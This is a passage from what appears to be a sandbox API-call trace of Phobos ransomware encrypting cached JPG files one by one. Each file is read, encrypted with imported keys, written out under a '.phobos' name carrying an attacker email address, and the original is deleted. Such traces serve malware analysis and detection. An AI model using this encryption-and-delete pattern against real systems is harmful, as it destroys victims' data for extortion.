lpOverlapped=0x0) returned 1 [0178.108] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0178.108] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.108] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0178.108] CryptDestroyKey (hKey=0xa32be8) returned 1 [0178.108] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0178.108] CryptDestroyKey (hKey=0xa32d28) returned 1 [0178.108] CloseHandle (hObject=0x178) returned 1 [0178.108] CloseHandle (hObject=0x14c) returned 1 [0178.109] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbzyvp[1].jpg")) returned 1 [0178.109] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0178.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04o2[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.110] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6442) returned 1 [0178.110] CloseHandle (hObject=0x14c) returned 1 [0178.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04o2[1].jpg")) returned 0x2020 [0178.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04o2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04o2[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.110] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.110] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04o2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.112] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0178.112] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.112] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x192a, lpOverlapped=0x0) returned 1 [0178.200] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1930, dwBufLen=0x1930 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1930) returned 1 [0178.200] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1930, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1930, lpOverlapped=0x0) returned 1 [0178.200] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0178.200] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.200] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0178.201] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.201] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0178.201] CryptDestroyKey (hKey=0xa32d28) returned 1 [0178.201] CloseHandle (hObject=0x14c) returned 1 [0178.201] CloseHandle (hObject=0x178) returned 1 [0178.201] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04o2[1].jpg")) returned 1 [0178.202] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0178.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.202] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=12800) returned 1 [0178.202] CloseHandle (hObject=0x178) returned 1 [0178.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[1].jpg")) returned 0x2020 [0178.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.202] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.203] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.203] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0178.203] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.203] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3200, lpOverlapped=0x0) returned 1 [0178.219] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3210, dwBufLen=0x3210 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3210) returned 1 [0178.219] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3210, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3210, lpOverlapped=0x0) returned 1 [0178.220] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0178.220] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.220] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0178.220] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.220] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0178.220] CryptDestroyKey (hKey=0xa32d28) returned 1 [0178.220] CloseHandle (hObject=0x178) returned 1 [0178.220] CloseHandle (hObject=0x14c) returned 1 [0178.220] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[1].jpg")) returned 1 [0178.221] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0178.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[2].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.222] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2017) returned 1 [0178.222] CloseHandle (hObject=0x14c) returned 1 [0178.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[2].jpg")) returned 0x2020 [0178.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[2].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.222] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.222] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.223] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0178.223] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.223] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7e1, lpOverlapped=0x0) returned 1 [0178.304] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7f0, dwBufLen=0x7f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7f0) returned 1 [0178.304] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7f0, lpOverlapped=0x0) returned 1 [0178.305] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0178.305] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.305] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0178.305] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.305] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0178.305] CryptDestroyKey (hKey=0xa32d28) returned 1 [0178.305] CloseHandle (hObject=0x14c) returned 1 [0178.305] CloseHandle (hObject=0x178) returned 1 [0178.306] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[2].jpg")) returned 1 [0178.306] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0178.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0atj[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.308] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6990) returned 1 [0178.308] CloseHandle (hObject=0x178) returned 1 [0178.308] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0atj[1].jpg")) returned 0x2020 [0178.308] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0atj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0atj[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0178.308] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.308] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0178.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0atj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.309] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0178.309] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.309] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1b4e, lpOverlapped=0x0) returned 1 [0178.310] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1b50, dwBufLen=0x1b50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1b50) returned 1 [0178.310] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1b50, lpOverlapped=0x0) returned 1 [0178.311] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0178.311] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0178.311] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0178.311] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.311] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0178.311] CryptDestroyKey (hKey=0xa32d28) returned 1 [0178.311] CloseHandle (hObject=0x178) returned 1 [0178.311] CloseHandle (hObject=0x14c) returned 1 [0178.311] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0atj[1].jpg")) returned 1 [0178.312] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0178.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0d8i[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0178.312] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1873) returned 1 [0178.312] CloseHandle (hObject=0x14c) returned 1 [0178.313] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0d8i[1].jpg")) returned 0x2020 [0178.313] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0d8i[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 